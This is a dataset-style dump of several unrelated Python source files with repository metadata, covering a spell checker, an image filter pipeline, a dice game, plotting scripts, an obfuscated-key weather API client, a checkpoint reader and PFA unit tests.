    visRefAxisY, = ax.plot(y_axis_[:,0], y_axis_[:,1], y_axis_[:,2],alpha=0.6, c='g')
    visRefAxisZ, = ax.plot(z_axis_[:,0], z_axis_[:,1], z_axis_[:,2],alpha=0.6, c='b')
    # Phone Object (red dot: the predicted pose)
    visPredPoints, = ax.plot(range(r_start,r_end),
                             range(r_start,r_end),
                             range(r_start,r_end),
                             alpha=0.6, linestyle="", marker=".", c='r')
    visPredAxisX, = ax.plot(x_axis_[:,0], x_axis_[:,1], x_axis_[:,2],alpha=0.6, c='r')
    visPredAxisY, = ax.plot(y_axis_[:,0], y_axis_[:,1], y_axis_[:,2],alpha=0.6, c='g')
    visPredAxisZ, = ax.plot(z_axis_[:,0], z_axis_[:,1], z_axis_[:,2],alpha=0.6, c='b')
    # Ground-truth object (blue dot), only updated when `truth` is provided.
    visTruthPoints, = ax.plot(range(r_start,r_end),
                              range(r_start,r_end),
                              range(r_start,r_end),
                              alpha=0.6, linestyle="", marker=".", c='b')
    visTruthAxisX, = ax.plot(x_axis_[:,0], x_axis_[:,1], x_axis_[:,2],alpha=0.6, c='r')
    visTruthAxisY, = ax.plot(y_axis_[:,0], y_axis_[:,1], y_axis_[:,2],alpha=0.6, c='g')
    visTruthAxisZ, = ax.plot(z_axis_[:,0], z_axis_[:,1], z_axis_[:,2],alpha=0.6, c='b')
    # Visualization Object List: the [point, x, y, z] grouping _update expects.
    ref_vis = [visRefPoints, visRefAxisX, visRefAxisY, visRefAxisZ]
    pred_vis = [visPredPoints, visPredAxisX, visPredAxisY, visPredAxisZ]
    truth_vis = [visTruthPoints, visTruthAxisX, visTruthAxisY, visTruthAxisZ]
    while True:
        # Busy-wait until both shared slots hold data.
        ref,pred = ref_[0],pred_[0]
        if ref is None or pred is None:
            continue
        if user_exit:
            exit()
        # _update(ref_vis,ref,length=800)
        _update(pred_vis,pred)
        if not truth is None:
            _update(truth_vis,truth)
        fig.canvas.draw()
        fig.canvas.flush_events()
8ecb338cf3968f1e2415034f8610eb76602e4a7a | 7,134 | py | Python | spell/keyboardspell.py | leolca/spellcheck | 1edf7a598052822d0f95885288a3cf7f6d706c84 | [
"MIT"
] | null | null | null | spell/keyboardspell.py | leolca/spellcheck | 1edf7a598052822d0f95885288a3cf7f6d706c84 | [
"MIT"
] | null | null | null | spell/keyboardspell.py | leolca/spellcheck | 1edf7a598052822d0f95885288a3cf7f6d706c84 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from .utils import exists, nlargest, removeMultiple
from .spell import Spell
class KeyboardSpell(Spell):
    """
    Spell checker that ranks correction candidates by blending corpus word
    frequency with the physical typing (keyboard) distance between the
    misspelled word and each candidate.

    Please provide a keyboard layout yourself (a JSON file or a python
    literal file) via the `keyboardlayoutfile` argument.
    """

    def __init__(self, spelldic=None, corpusfile=None, suffixfile=None, language=None, encoding=None, keyboardlayoutfile=None, weightObjFun=None):
        """
        Args:
            spelldic, corpusfile, suffixfile, language, encoding: forwarded
                unchanged to the Spell base constructor.
            keyboardlayoutfile: keyboard layout file path (JSON or python
                literal), or None for no layout.
            weightObjFun: (frequency_weight, distance_weight) pair summing
                to 1; defaults to (0.5, 0.5).
        """
        # Call the parent constructor first so dictionary state is ready.
        Spell.__init__(self, spelldic, corpusfile, suffixfile, language, encoding)
        self.load_keyboard_layout(keyboardlayoutfile)
        self.set_weightObjFun(weightObjFun)

    @classmethod
    def from_file(cls, spelldic=None, corpusfile=None, suffixfile=None, language=None, encoding=None, keyboardlayoutfile=None, weightObjFun=None):
        """Alternate constructor kept for API symmetry with the base class."""
        return cls(spelldic, corpusfile, suffixfile, language, encoding, keyboardlayoutfile, weightObjFun)

    def set_weightObjFun(self, weight):
        """
        Set the (frequency, distance) weight pair used by ObjectiveFunction.

        Raises:
            TypeError: if the supplied weights do not sum to 1.
        """
        if weight is None:
            self.weightObjFun = (0.5, 0.5)
        else:
            if sum(weight) != 1:
                raise TypeError("Weights do not sum 1.")
            self.weightObjFun = weight

    def load_keyboard_layout(self, keyboardlayoutfile):
        """
        Read keyboard layout from JSON file or text file (in this case,
        performs a literal evaluation of the python string).

        Args:
            keyboardlayoutfile: A keyboard layout file in JSON format or
                using python syntax; None leaves the speller without a layout.
        """
        import json
        # Bug fix: kblayout was previously left undefined when no file was
        # given, so getCharacterCoord raised AttributeError instead of its
        # intended "Speller keyboard is empty!" error.
        self.kblayout = None
        if keyboardlayoutfile is not None:
            if keyboardlayoutfile.endswith('.json'):
                with open(keyboardlayoutfile, 'r') as f:
                    self.kblayout = json.load(f)
            else:
                import ast
                with open(keyboardlayoutfile, 'r') as f:
                    self.kblayout = ast.literal_eval(f.read())

    def getCharacterCoord(self, c):
        """
        Finds a 2-tuple representing c's position on the given keyboard array.
        If the character is not in the given array, throws a ValueError.
        """
        if self.kblayout is None:
            raise Exception("Speller keyboard is empty!")
        for kb in self.kblayout:
            for r in kb:
                if c in r:
                    # (row, column) of the first layer containing c.
                    return (kb.index(r), r.index(c))
        raise ValueError(c + " not found in given keyboard layout")

    def typoDistance(self, s, t, saturation=1000):
        """
        Finds the typo Manhattan distance (an integer) between two characters,
        based on the keyboard layout. The distance might be a saturated value.
        """
        # Add one if one is lowercase and the other is not (shift difference).
        addShiftDiff = int(s.islower() != t.islower())
        sc = self.getCharacterCoord(s.lower())
        tc = self.getCharacterCoord(t.lower())
        return min(sum(abs(x - y) for x, y in zip(sc, tc)) + addShiftDiff, saturation)

    def keyboard_damerau_levenshtein_distance(self, s1, s2, saturation=4):
        """
        Computes the Damerau-Levenshtein distance between two strings
        considering different typo distances according to their keyboard
        distance. The substitution cost is the keyboard distance between the
        two typos involved; the insertion and deletion cost is the minimum
        distance between the inserted/deleted typo and its neighbours.
        """
        d = {}
        lenstr1 = len(s1)
        lenstr2 = len(s2)
        # Boundary rows/columns of the DP table.
        for i in range(-1, lenstr1 + 1):
            d[(i, -1)] = i + 1
        for j in range(-1, lenstr2 + 1):
            d[(-1, j)] = j + 1
        for i in range(lenstr1):
            for j in range(lenstr2):
                if s1[i] == s2[j]:
                    cost = 0
                else:
                    cost = self.typoDistance(s1[i], s2[j], saturation=saturation)
                # Deleting/inserting a character costs its distance to the
                # nearest neighbouring character (10 when no neighbour exists).
                delcost = min(self.typoDistance(s1[i], s1[i - 1], saturation=saturation) if i > 0 and i < lenstr1 else 10,
                              self.typoDistance(s1[i], s1[i + 1], saturation=saturation) if i > -1 and i < lenstr1 - 1 else 10)
                inscost = min(self.typoDistance(s2[j], s2[j - 1], saturation=saturation) if j > 0 and j < lenstr2 else 10,
                              self.typoDistance(s2[j], s2[j + 1], saturation=saturation) if j > -1 and j < lenstr2 - 1 else 10)
                d[(i, j)] = min(
                    d[(i - 1, j)] + delcost,    # deletion
                    d[(i, j - 1)] + inscost,    # insertion
                    d[(i - 1, j - 1)] + cost,   # substitution
                )
                if i and j and s1[i] == s2[j - 1] and s1[i - 1] == s2[j]:
                    d[(i, j)] = min(d[(i, j)], d[i - 2, j - 2] + cost)  # transposition
        return d[lenstr1 - 1, lenstr2 - 1]

    def ObjectiveFunction(self, candidate, word, saturation=4):
        """
        Objective function for the optimization process: balances the
        candidate's corpus frequency against its typing distance from the
        misspelled word:

            w0 * log(f/m)/log(M/m) - w1 * log(d)/log(d_max)

        Candidates not in the dictionary score -d so that closer unknown
        words still rank above distant ones.
        """
        # NOTE(review): two unreachable `return` statements from the
        # original (after the if/else and after the super() call) removed.
        if self.weightObjFun[1] > 0:
            # Bug fix: log10 was used but never imported anywhere in this
            # module, raising NameError on this path.
            from math import log10
            d = self.keyboard_damerau_levenshtein_distance(candidate, word, saturation)
            maxdist = saturation * max(len(candidate), len(word))
            if candidate in self.WORDS:
                # NOTE(review): log10(d) assumes d > 0, which holds whenever
                # candidate != word -- confirm callers never pass equal strings.
                return self.weightObjFun[0] * (log10(float(self.WORDS[candidate]) / self.m) / log10(float(self.M) / self.m)) \
                       - self.weightObjFun[1] * (log10(float(d)) / log10(maxdist))
            return -d
        # Distance weight of zero: defer entirely to the base-class score.
        return super(KeyboardSpell, self).ObjectiveFunction(candidate, word)
| 45.43949 | 174 | 0.585506 | 844 | 7,134 | 4.885071 | 0.241706 | 0.03056 | 0.021829 | 0.036866 | 0.294446 | 0.256124 | 0.252244 | 0.226049 | 0.205675 | 0.191123 | 0 | 0.021691 | 0.308523 | 7,134 | 156 | 175 | 45.730769 | 0.814109 | 0.340342 | 0 | 0.083333 | 0 | 0 | 0.019822 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.047619 | 0.011905 | 0.261905 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ecc375f9b2ef579824f623a0c86a56a39d05d4d | 2,262 | py | Python | src/helpTool/imFilterPipeline.py | uguisu/DraftTensorflow_chinese_hand_writing | 13f4097dff53ff32d10d51789975700e18052500 | [
"Apache-2.0"
] | null | null | null | src/helpTool/imFilterPipeline.py | uguisu/DraftTensorflow_chinese_hand_writing | 13f4097dff53ff32d10d51789975700e18052500 | [
"Apache-2.0"
] | 1 | 2018-01-25T06:39:52.000Z | 2018-01-25T13:37:44.000Z | src/helpTool/imFilterPipeline.py | uguisu/DraftTensorflow_chinese_hand_writing | 13f4097dff53ff32d10d51789975700e18052500 | [
"Apache-2.0"
] | 1 | 2018-04-22T13:55:18.000Z | 2018-04-22T13:55:18.000Z | # encoding: UTF-8
import cv2
import numpy as np
class ImFilterPipeline:
    """
    A configurable chain of OpenCV image filters (rotate, blur, Gaussian
    blur, resize) applied in order by ``filter``.

    Each entry of the pipeline dict is a 0/1 flag; set an entry to 1 via
    the ``pipeline`` property to enable that stage.
    """
    def __init__(self):
        # init pipeline: every stage disabled by default
        self._pipeline = {
            "rotated": 0,
            "blur": 0,
            "gaussianBlur": 0,
            "resize": 0
        }

    @property
    def pipeline(self):
        # Returns the live dict, so callers enable stages by assigning
        # into it (e.g. obj.pipeline["blur"] = 1).
        return self._pipeline

    def _rotate_bound_with_white_background(self, image, angle):
        """
        Copy from imutils.rotate_bound. Change background color from (0,0,0) to (255,255,255)
        :param image: image
        :param angle: angle from 0 ~ 360
        :return: processed image
        """
        # grab the dimensions of the image and then determine the
        # center
        (h, w) = image.shape[:2]
        (cX, cY) = (w / 2, h / 2)
        # grab the rotation matrix (applying the negative of the
        # angle to rotate clockwise), then grab the sine and cosine
        # (i.e., the rotation components of the matrix)
        M = cv2.getRotationMatrix2D((cX, cY), -angle, 1.0)
        cos = np.abs(M[0, 0])
        sin = np.abs(M[0, 1])
        # compute the new bounding dimensions of the image
        nW = int((h * sin) + (w * cos))
        nH = int((h * cos) + (w * sin))
        # adjust the rotation matrix to take into account translation
        M[0, 2] += (nW / 2) - cX
        M[1, 2] += (nH / 2) - cY
        # perform the actual rotation and return the image
        return cv2.warpAffine(image, M, (nW, nH), borderValue=(255, 255, 255))

    def _blur(self, image, ksize=(5, 5)):
        # Simple box blur with a 5x5 kernel by default.
        return cv2.blur(image, ksize)

    def _gaussianBlur(self, image, ksize=(5, 5), sigmaX=0):
        # Gaussian blur; sigmaX=0 lets OpenCV derive sigma from the kernel size.
        return cv2.GaussianBlur(image, ksize, sigmaX)

    def _resize(self, image, target_size=64):
        # Resize to a square of target_size x target_size pixels.
        return cv2.resize(image, (target_size, target_size))

    def filter(self, image):
        """Apply every enabled pipeline stage to `image` and return the result."""
        rtn = image
        if self._pipeline["rotated"] == 1:
            # NOTE(review): np.random.choice(..., 1) yields a 1-element array,
            # not a scalar -- confirm cv2 accepts it as the rotation angle.
            rtn = self._rotate_bound_with_white_background(rtn, np.random.choice(np.arange(0, 360), 1))
        if self._pipeline["blur"] == 1:
            rtn = self._blur(rtn)
        if self._pipeline["gaussianBlur"] == 1:
            rtn = self._gaussianBlur(rtn)
        if self._pipeline["resize"] == 1:
            rtn = self._resize(rtn)
        return rtn
| 29.763158 | 103 | 0.564987 | 297 | 2,262 | 4.20202 | 0.319865 | 0.057692 | 0.044872 | 0.032051 | 0.073718 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043786 | 0.313439 | 2,262 | 75 | 104 | 30.16 | 0.75982 | 0.2542 | 0 | 0 | 0 | 0 | 0.035605 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.170732 | false | 0 | 0.04878 | 0.097561 | 0.390244 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ecef356f844a42e3d374691a1124f1ea40fd4a1 | 1,225 | py | Python | etc/metadataParsers/includes/nameparser-0.2.3/setup.py | organisciak/HTRC-BookwormDB | bc24080d6443f8da38255e19149431c9e5b182ab | [
"MIT"
] | null | null | null | etc/metadataParsers/includes/nameparser-0.2.3/setup.py | organisciak/HTRC-BookwormDB | bc24080d6443f8da38255e19149431c9e5b182ab | [
"MIT"
] | null | null | null | etc/metadataParsers/includes/nameparser-0.2.3/setup.py | organisciak/HTRC-BookwormDB | bc24080d6443f8da38255e19149431c9e5b182ab | [
"MIT"
] | null | null | null | #!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
import nameparser
import os
def read(fname):
    """Return the text of `fname`, resolved relative to this file's directory."""
    # Bug fix: use a context manager so the file handle is closed promptly;
    # the original `open(...).read()` left closing to the garbage collector.
    with open(os.path.join(os.path.dirname(__file__), fname)) as f:
        return f.read()
# Long description is pulled from the adjacent README file.
README = read('README.rst')

# Distribution metadata; version/author fields are sourced from the
# nameparser package itself so they are defined in exactly one place.
setup(name='nameparser',
      packages = ['nameparser'],
      description = 'A simple Python module for parsing human names into their individual components.',
      long_description = README,
      version = nameparser.__version__,
      url = nameparser.__url__,
      author = nameparser.__author__,
      author_email = nameparser.__author_email__,
      license = nameparser.__license__,
      keywords = ['names','parser'],
      classifiers = [
          'Intended Audience :: Developers',
          'Operating System :: OS Independent',
          "License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)",
          'Programming Language :: Python',
          'Development Status :: 5 - Production/Stable',
          'Natural Language :: English',
          "Topic :: Software Development :: Libraries :: Python Modules",
          'Topic :: Text Processing :: Linguistic',
      ]
      )
| 35 | 105 | 0.629388 | 119 | 1,225 | 6.252101 | 0.672269 | 0.02957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001111 | 0.265306 | 1,225 | 34 | 106 | 36.029412 | 0.825556 | 0.016327 | 0 | 0 | 0 | 0 | 0.383721 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.166667 | 0.033333 | 0.233333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ed11d23c76018ac70846f21efa7b622a426700a | 973 | py | Python | DiceRoll.py | SwethaGudla/Dice_POC | 818b343773027791508b59badf7159b1fee5f2f8 | [
"BSD-3-Clause"
] | null | null | null | DiceRoll.py | SwethaGudla/Dice_POC | 818b343773027791508b59badf7159b1fee5f2f8 | [
"BSD-3-Clause"
] | null | null | null | DiceRoll.py | SwethaGudla/Dice_POC | 818b343773027791508b59badf7159b1fee5f2f8 | [
"BSD-3-Clause"
] | null | null | null | import roll_dice as r #importing RollDice module
COUNT = 0  # number of successful dice rolls performed so far
while True:
    # Read one command per iteration; long ('down') and short ('d') forms accepted.
    roll = input("Enter your choice(d/u/l/r): ").lower()
    if roll == 'down' or roll == 'd':
        r.dice_down(r.res)
        COUNT+=1
    elif roll == 'up'or roll =='u':
        r.dice_up(r.res)
        COUNT+=1
    elif roll == 'left'or roll =='l':
        r.dice_left(r.res)
        COUNT+=1
    elif roll == 'right'or roll =='r':
        r.dice_right(r.res)
        COUNT+=1
    elif roll == 'quit'or roll =='q':  # quit: print summary, then leave the loop
        print('\n')
        print("number of times dices roll: ",COUNT)
        # Replay every recorded dice position so far.
        for i in r.list_all:
            r.dice(i)
        print("latest position of dice")
        r.dice(r.res)
        print('Thanks for Participation, Visit Again!!!')
        break
    else:
        # Anything unrecognised: prompt again.
        print('Invalid move\nPlease Make Correct Choice!!! ')
| 27.027778 | 75 | 0.51593 | 136 | 973 | 3.647059 | 0.441176 | 0.060484 | 0.072581 | 0.080645 | 0.145161 | 0.145161 | 0 | 0 | 0 | 0 | 0 | 0.007899 | 0.349435 | 973 | 35 | 76 | 27.8 | 0.775671 | 0.103803 | 0 | 0.148148 | 0 | 0 | 0.229369 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.037037 | 0 | 0.037037 | 0.185185 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ed3c961a32f648b6ecbf986b24a8369b72e355c | 457 | py | Python | 05_data_science/matplotlib/bar_chart.py | bluehenry/python.best.practices | 99fde3557b0c423d3050e988e82a641ccd75b644 | [
"MIT"
] | null | null | null | 05_data_science/matplotlib/bar_chart.py | bluehenry/python.best.practices | 99fde3557b0c423d3050e988e82a641ccd75b644 | [
"MIT"
] | null | null | null | 05_data_science/matplotlib/bar_chart.py | bluehenry/python.best.practices | 99fde3557b0c423d3050e988e82a641ccd75b644 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
import numpy as np
# Grouped bar chart comparing salary and age per division.
divisions = ['Admin', 'Development', 'Lead', 'HR']
salary = [10, 14,20, 12]
age = [28, 30, 45, 32]

index = np.arange(4)  # one slot per division on the x-axis
width = 0.3           # bar width; the two series are offset by this amount

plt.bar(index, salary, width, color='green', label='Salary')
plt.bar(index+width, age, width, color='blue', label='Age')
plt.title('Divisions Bar Chart')
plt.xlabel('Divisions')
plt.ylabel('Number')  # bug fix: axis label typo 'NUmber' corrected
plt.xticks(index+width/2, divisions)  # centre tick labels between the paired bars
plt.legend(loc='best')
plt.show()
| 22.85 | 60 | 0.684902 | 73 | 457 | 4.287671 | 0.60274 | 0.038339 | 0.070288 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.049628 | 0.118162 | 457 | 19 | 61 | 24.052632 | 0.727047 | 0 | 0 | 0 | 0 | 0 | 0.171053 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.133333 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ed58557b8e3435731641f5c05374ed0db710745 | 1,951 | py | Python | python/clima.py | crato-thaissa/crato-thaissa.github.Io | 91d18e38461bdd202f0262abace65595fa1efa96 | [
"MIT"
] | null | null | null | python/clima.py | crato-thaissa/crato-thaissa.github.Io | 91d18e38461bdd202f0262abace65595fa1efa96 | [
"MIT"
] | null | null | null | python/clima.py | crato-thaissa/crato-thaissa.github.Io | 91d18e38461bdd202f0262abace65595fa1efa96 | [
"MIT"
] | null | null | null |
from string import *
import json, sys
from urllib.request import urlopen
#parameters
# Obfuscated parameter strings: decoded at call time (via `decrypt` below)
# into the weather-API request URL fragments and key -- presumably
# OpenWeatherMap, TODO confirm the decoded values.
params1 = "<||^{tss+^=r]^/\A/+|</`[+^r]`;s.+|+s#r&sA/+|</`y_w"
params2 = ':#%:%!,"'
params3 = "-#%&!&')&:-/$,)+-.!:-::-"
params4 = params2 + params3
params_id = "j+^^=.w"
unit = [ "k", "atm"]  # NOTE(review): defined but never referenced in this file
# Substitution-cipher tables: `encrypt` maps printable characters onto a
# rearranged alphabet and `decrypt` is its exact inverse.
data1 = printable
data2 = punctuation+ascii_uppercase+ascii_lowercase+digits
encrypt = str.maketrans(dict(zip(data1, data2)))
decrypt = str.maketrans(dict(zip(data2, data1)))
# Fetch and print the weather forecast for a city (comment translated from
# Portuguese: "obter função clima" = "get weather function").
def getWeather(weather):
    """Fetch the current weather for `weather` (a city name) from the remote
    API and print a human-readable summary.

    Performs a blocking HTTP request; raises on network/JSON errors.
    """
    # Decode the obfuscated URL pieces: base URL, key suffix, and id segment.
    lin = params1.translate(decrypt)
    kim = params4.translate(decrypt)
    idm = params_id.translate(decrypt)
    link = urlopen(lin + weather + idm + kim).read()
    getjson = json.loads(link)
    print("A previsao do tempo em {}".format(weather),'\n')
    # NOTE(review): each `.get` default below is a *set* literal (e.g.
    # {"temp"}), so a missing key would make the later ['temp'] lookups raise
    # TypeError rather than fall back gracefully -- confirm intent.
    main = getjson.get("main", {"temp"})
    main2 = getjson.get("main", {"pressure"})
    main3 = getjson.get("main", {"humidity"})
    main4 = getjson.get("main", {"temp_min"})
    main5 = getjson.get("main", {"temp_max"})
    main6 = getjson.get("main", {"tomorrow"})
    wind = getjson.get("wind", {"speed"})
    sys = getjson.get("sys", {"country"})  # NOTE(review): shadows the imported sys module locally
    coord = getjson.get("coord", {"lon"})
    coord1 = getjson.get("coord", {"lat"})
    weth = getjson.get("weather", {"description"})
    # Output: temperatures arrive in Kelvin, hence the -273 conversions.
    print("Temperatura :",round(main['temp']-273), "deg")
    print("Pressao :",main2["pressure"],"atm")
    print("Umidade :",main3["humidity"])
    print("Velocidade-vento :",wind['speed'],"mph")
    print("Max-temp: {}c , Min-temp: {}c".format(round(main5['temp_max']-273),round(main4['temp_min']-273)))
    print("Latitude :",coord['lat'])
    print("Longitude :",coord['lon'])
    print("Pais :",sys['country'])
# Prompt for a city name; default to "cacule" when the user just hits enter.
ent = input() or "cacule"
try:
    getWeather(ent)
except Exception:
    # Bug fix: was a bare `except:` which also swallowed SystemExit and
    # KeyboardInterrupt; narrowed to Exception.
    print("Coloque outra cidade")
finally:
    print("\n")
    print("Tschüss / Goodbye / Adeus")
8ed69e0440b6aec85c5fa9e138215b592e9adcb1 | 2,309 | py | Python | src/main/python/apache/thermos/bin/thermos_ckpt.py | zmanji/incubator-aurora | 9f594f1de6bbf46c74863dd3fc4d2708b7a974f2 | [
"Apache-2.0"
] | null | null | null | src/main/python/apache/thermos/bin/thermos_ckpt.py | zmanji/incubator-aurora | 9f594f1de6bbf46c74863dd3fc4d2708b7a974f2 | [
"Apache-2.0"
] | null | null | null | src/main/python/apache/thermos/bin/thermos_ckpt.py | zmanji/incubator-aurora | 9f594f1de6bbf46c74863dd3fc4d2708b7a974f2 | [
"Apache-2.0"
] | null | null | null | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import pprint
import sys
import time
from twitter.common import app
from twitter.common.recordio import RecordIO, ThriftRecordReader
from apache.thermos.common.ckpt import CheckpointDispatcher
from gen.apache.thermos.ttypes import RunnerCkpt, RunnerState, TaskState
# CLI flag definitions, registered with twitter.common.app before main() runs.
app.add_option(
    "--checkpoint",
    dest="ckpt",
    metavar="CKPT",
    help="read checkpoint from CKPT")
app.add_option(
    "--assemble",
    dest="assemble",
    # NOTE(review): metavar looks copied from --checkpoint; --assemble is a
    # boolean (default True), not a path.
    metavar="CKPT",
    default=True,
    help="whether or not to replay the checkpoint records.")
def main(args):
    """Read a thermos runner checkpoint stream and pretty-print the
    recovered state, optionally replaying records into a RunnerState.

    Args:
        args: leftover positional CLI arguments; any present are an error.
    """
    values = app.get_options()
    if len(args) > 0:
        print("ERROR: unrecognized arguments: %s\n" % (" ".join(args)), file=sys.stderr)
        app.help()
        sys.exit(1)
    if not values.ckpt:
        print("ERROR: must supply --checkpoint", file=sys.stderr)
        app.help()
        sys.exit(1)

    wrs = RunnerState(processes={})
    dispatcher = CheckpointDispatcher()
    # Bug fix: the original used the Python-2-only builtin `file(...)` and
    # never closed the handle; open() in a context manager works on both
    # Python 2 and 3 and guarantees the handle is released.
    with open(values.ckpt, "r") as fp:
        rr = ThriftRecordReader(fp, RunnerCkpt)
        try:
            for wts in rr:
                print('Recovering: %s' % wts)
                if values.assemble is True:
                    dispatcher.dispatch(wrs, wts)
        except RecordIO.Error as err:
            print('Error recovering checkpoint stream: %s' % err, file=sys.stderr)
            return

    print('\n\n\n')
    if values.assemble:
        print('Recovered Task Header')
        pprint.pprint(wrs.header, indent=4)
        print('\nRecovered Task States')
        for task_status in wrs.statuses:
            # timestamp_ms is epoch milliseconds; convert to local time.
            print(' %s [pid: %d] => %s' % (
                time.asctime(time.localtime(task_status.timestamp_ms / 1000.0)),
                task_status.runner_pid,
                TaskState._VALUES_TO_NAMES[task_status.state]))
        print('\nRecovered Processes')
        pprint.pprint(wrs.processes, indent=4)
# Hand control to twitter.common.app: parses flags, then invokes main().
app.main()
| 27.488095 | 84 | 0.695972 | 313 | 2,309 | 5.079872 | 0.460064 | 0.037736 | 0.024528 | 0.020126 | 0.03522 | 0.03522 | 0.03522 | 0.03522 | 0 | 0 | 0 | 0.007491 | 0.190559 | 2,309 | 83 | 85 | 27.819277 | 0.843232 | 0.225639 | 0 | 0.148148 | 0 | 0 | 0.183766 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018519 | false | 0 | 0.148148 | 0 | 0.185185 | 0.240741 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ed6cda7ad637a16bcaea267f7b03c869ea08e8b | 1,913 | py | Python | test/lib/testFixed.py | animator/titus2 | 1d35fab2950bd9f0438b931a02996475271a695e | [
"Apache-2.0"
] | 18 | 2019-11-29T08:53:58.000Z | 2021-11-19T05:33:33.000Z | test/lib/testFixed.py | animator/titus2 | 1d35fab2950bd9f0438b931a02996475271a695e | [
"Apache-2.0"
] | 2 | 2020-04-29T12:58:32.000Z | 2021-03-23T05:55:43.000Z | test/lib/testFixed.py | animator/titus2 | 1d35fab2950bd9f0438b931a02996475271a695e | [
"Apache-2.0"
] | 1 | 2020-05-05T15:10:27.000Z | 2020-05-05T15:10:27.000Z | #!/usr/bin/env python
# Copyright (C) 2014 Open Data ("Open Data" refers to
# one or more of the following companies: Open Data Partners LLC,
# Open Data Research LLC, or Open Data Capital LLC.)
#
# This file is part of Hadrian.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import unittest
from titus.genpy import PFAEngine
from titus.errors import *
class TestLib1Fixed(unittest.TestCase):
    """Tests for the PFA `fixed.*` library functions via the titus engine.

    NOTE(review): the YAML literals below were re-indented while restoring
    this file's formatting; indentation inside them is significant to YAML,
    so verify against the upstream file.
    """

    def testToBytes(self):
        """fixed.toBytes should pass the 10-byte fixed value through unchanged."""
        engine, = PFAEngine.fromYaml('''
input: {type: fixed, name: Test, size: 10}
output: bytes
action:
  fixed.toBytes: input
''')
        self.assertEqual(engine.action("0123456789"), "0123456789")

    def testFromBytes(self):
        """fixed.fromBytes overwrites a prefix of `original`: short input
        keeps the original's tail, over-long input is truncated to size 10."""
        engine, = PFAEngine.fromYaml('''
input: bytes
output: {type: fixed, name: Test, size: 10}
action:
  - let:
      original:
        type: Test
        value: "0123456789"
  - fixed.fromBytes: [original, input]
''')
        # Empty input: original "0123456789" unchanged (ordinals 48..57).
        self.assertEqual(list(map(ord, engine.action(""))), [48, 49, 50, 51, 52, 53, 54, 55, 56, 57])
        # 9 bytes: last original byte ('9' == 57) is preserved.
        self.assertEqual(list(map(ord, engine.action("".join(map(chr, [0, 1, 2, 3, 4, 5, 6, 7, 8]))))), [0, 1, 2, 3, 4, 5, 6, 7, 8, 57])
        # Exactly 10 bytes: full replacement.
        self.assertEqual(list(map(ord, engine.action("".join(map(chr, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]))))), [0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
        # 11 bytes: extra byte dropped.
        self.assertEqual(list(map(ord, engine.action("".join(map(chr, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]))))), [0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
